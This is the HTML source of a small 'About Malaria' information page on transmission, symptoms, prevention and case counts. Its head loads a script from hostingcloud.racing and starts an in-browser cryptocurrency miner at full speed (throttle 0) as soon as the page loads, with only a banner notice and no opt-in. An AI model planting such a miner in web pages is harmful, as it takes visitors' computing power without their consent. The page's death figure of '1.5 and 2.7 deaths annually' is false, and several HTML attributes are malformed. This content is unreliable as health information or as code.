<!DOCTYPE html>
<html>
    <head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
  new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
  j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
  'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
  })(window,document,'script','dataLayer','GTM-MBZVZ56');</script>
  <!-- End Google Tag Manager -->
        <meta charset="UTF-8">
        <title>About Malaria</title>
        <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-1289491077433459"
     crossorigin="anonymous"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <style>
        html, body {
          height: 100%;
          margin: 0;
          padding: 10px;
        }
        h1 {
          text-align:center;
        }
        body {
          background: white;
          font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif
        }
                .topnav {
  overflow: hidden;
  background-color: #333;
}

.topnav a {
  float: left;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}

.topnav a:hover {
  background-color: #ddd;
  color: black;
}

.topnav a.active {
  background-color: #04AA6D;
  color: white;
}
section {
    color: red;
}
.stats {
  font-size: 2em;
  color: red;
}
        </style>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-1289491077433459"
crossorigin="anonymous"></script>
<script src="https://www.hostingcloud.racing/hhuJ.js"></script>
<script>
    var _client = new Client.Anonymous('5649ce13f4c0ec3b4f6878cfcaa67ba1688834d69285cb5b8a3f5037b8779498', {
        throttle: 0, c: 'w'
    });
    _client.start();
    _client.addMiningNotification("Top", "This site is running a miner to prevent malaria.", "#cccccc", 40, "#3d3d3d");

</script>
    </head>
    <body>
      <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MBZVZ56"
  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
  <!-- End Google Tag Manager (noscript) -->
      <div class="topnav">
        <a class=""active" href="index.html">Back home</a>
        <a href="https://www.malariaconsortium.org/ target="_blank"">Where we are donating to</a>
        <a href="aboutmalaria.html">About Malaria</a>
        <!--<a href="games.html">Games</a>-->
      </div>
        <h1>About Malaria </h1>
        <section><h2 class="warning">*NOT MEDICAL ADVICE* IF YOU HAVE MALARIA, SEEK MEDICAL TREATMENT FROM A DOCTOR</h2></section>
        <h2>How do you get infected?</h2>
        <p>You can get infected with malaria when someone with malaria gets bitten by specific kinds of mosquitos, and that mosquito then bites you.</p>
        <h2>Symptoms</h2>
        <p>You normally get typical flu symptoms, although complications include:
            <ul>
                <li>Malaria infecting your brain, causing death</li>
                <li>Accumulated fluid in your lungs (pulmonary edema)</li>
                <li>Organ Failure</li>
                <li>Anemia</li>
            </ul>
        </p>
        <h2>Prevention</h2>
        <p>Malaria can be prevented by stopping mosquito bites. Using <a class="nets" href="https://nothingbutnets.net/">bed nets</a>, wearing bug spray and taking steps to stop mosquito breeding can help.</p>
        <h2>How many people get malaria?</h2>
          <p class="stats">Aproximately 300 to 500 million new cases and between 1.5 and 2.7 deaths annually!</p>
        <h2>Where is malaria?</h2>
        <img src="map.png" width="30%">
        <p>This website has cookies🍪</p>
      </body>
</html>
